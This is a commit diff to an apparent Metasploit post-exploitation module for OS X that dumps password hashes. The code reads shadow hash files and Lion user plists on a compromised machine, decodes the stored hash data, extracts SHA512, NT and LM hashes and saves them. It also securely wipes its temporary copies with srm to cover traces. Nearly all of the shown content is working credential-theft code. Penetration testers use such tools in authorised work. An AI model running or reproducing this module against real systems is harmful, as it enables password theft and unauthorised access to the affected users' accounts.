removed unused code and added comments, also improve a bit the extraction of the hashes in the case Lion is configured and integrated with AD

git-svn-id: file:///home/svn/framework3/trunk@13125 4d416f70-5f16-0410-b530-b9f4589650da

modules/post/osx/gather/hashdump.rb

@@ -88,6 +88,7 @@ class Metasploit3 < Msf::Post
 		end
 		return fields
 	end
+
 	# Function for creating the folder for gathered data
 	def log_folder_create(log_path = nil)
 		#Get hostname
@@ -116,12 +117,8 @@ class Metasploit3 < Msf::Post
 	# Checks if running as root on the target
 	def check_root
 		# Get only the account ID
-		case session.type
-		when /shell/
-			id = session.shell_command_token("/usr/bin/id -ru").chomp
-		when /meterpreter/
-			id = cmd_exec("/usr/bin/id","-ru").chomp
-		end
+		id = cmd_exec("/usr/bin/id","-ru").chomp
+		
 		if id == "0"
 			return true
 		else
@@ -133,12 +130,7 @@ class Metasploit3 < Msf::Post
 	# Enumerate the OS Version
 	def get_ver
 		# Get the OS Version
-		case session.type
-		when /meterpreter/
-			osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
-		when /shell/
-			osx_ver_num = session.shell_command_token("/usr/bin/sw_vers -productVersion").chomp
-		end
+		osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
 
 		return osx_ver_num
 	end
@@ -149,12 +141,9 @@ class Metasploit3 < Msf::Post
 		users = []
 		nt_hash = nil
 		host,port = session.tunnel_peer.split(':')
-		case session.type
-		when /meterpreter/
-			users_folder = cmd_exec("/bin/ls","/Users")
-		when /shell/
-			users_folder = session.shell_command_token("/bin/ls /Users")
-		end
+		
+		users_folder = cmd_exec("/bin/ls","/Users")
+		
 		users_folder.each_line do |u|
 			next if u.chomp =~ /Shared|\.localized/
 			users << u.chomp
@@ -168,43 +157,51 @@ class Metasploit3 < Msf::Post
 		# Process each user
 		users.each do |user|
 			if ver_num =~ /10\.(6|5)/
-				case session.type
-				when /meterpreter/
-					guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
-				when /shell/
-					guid = session.shell_command_token("/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
-				end
+				
+				guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
+				
 			elsif ver_num =~ /10\.(4|3)/
-				case session.type
-				when /meterpreter/
-					guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
-				when /shell/
-					guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
-				end
+		
+				guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
+				
 			elsif ver_num =~ /10\.(7)/
+
 				require 'rexml/document'
 				hash_decoded = ""
+
+				# get list of profiles present in the box
 				profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
+
 				if profiles
 					profiles.each do |p|
+						# Skip none user profiles
 						next if p =~ /^_/
 						next if p =~ /^daemon|root|nobody/
+
+						# Turn profile plist in to XML format
 						cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
 						cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
 						file = cmd_exec("cat /tmp/#{p.chomp}")
-						plist_values = read_ds_xml_plist(file)
+
+						# Clean up using secure delete overwriting and zeroing blocks
+						cmd_exec("/usr/bin/srm -m -z /tmp/#{p.chomp}")
 						
+						# Process XML Plist into a usable hash
+						plist_values = read_ds_xml_plist(file)
+
+						# Extract the shadow hash data, decode it and format it
 						plist_values['ShadowHashData'].join("").unpack('m')[0].each_byte do |b|
 							hash_decoded << sprintf("%02X", b)
 						end
 						user = plist_values['name']
+
 						# Check if NT HASH is present
-						if hash_decoded =~ /0304524E545D53414C5445442D5348413531324F101/
+						if hash_decoded =~ /4F1010/
 							nt_hash = hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)
 						end
-						hashes = hash_decoded.gsub(/^\w*1044/,"")
-						sha512 = hashes.slice(0..135)
 
+						# Carve out the SHA512 Hash, the first 4 bytes is the salt
+						sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]
 
 						print_status("SHA512:#{user}:#{sha512}")
 						file_local_write(sha1_file,"#{user}:#{sha512}")
@@ -232,7 +229,7 @@ class Metasploit3 < Msf::Post
 							)
 							
 							# Reset hash value
-							nt_hash = ""
+							nt_hash = nil
 						end
 						# Reset hash value
 						hash_decoded = ""
@@ -242,16 +239,10 @@ class Metasploit3 < Msf::Post
 			end
 
 			# Extract the hashes
-			case session.type
-			when /meterpreter/
-				sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c169-216").chomp
-				nt_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c1-32").chomp
-				lm_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c33-64").chomp
-			when /shell/
-				sha1_hash = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid}  | cut -c169-216").chomp
-				nt_hash   = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid}  | cut -c1-32").chomp
-				lm_hash   = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid}  | cut -c33-64").chomp
-			end
+			sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c169-216").chomp
+			nt_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c1-32").chomp
+			lm_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c33-64").chomp
+			
 
 			# Check that we have the hashes and save them
 			if sha1_hash !~ /00000000000000000000000000000000/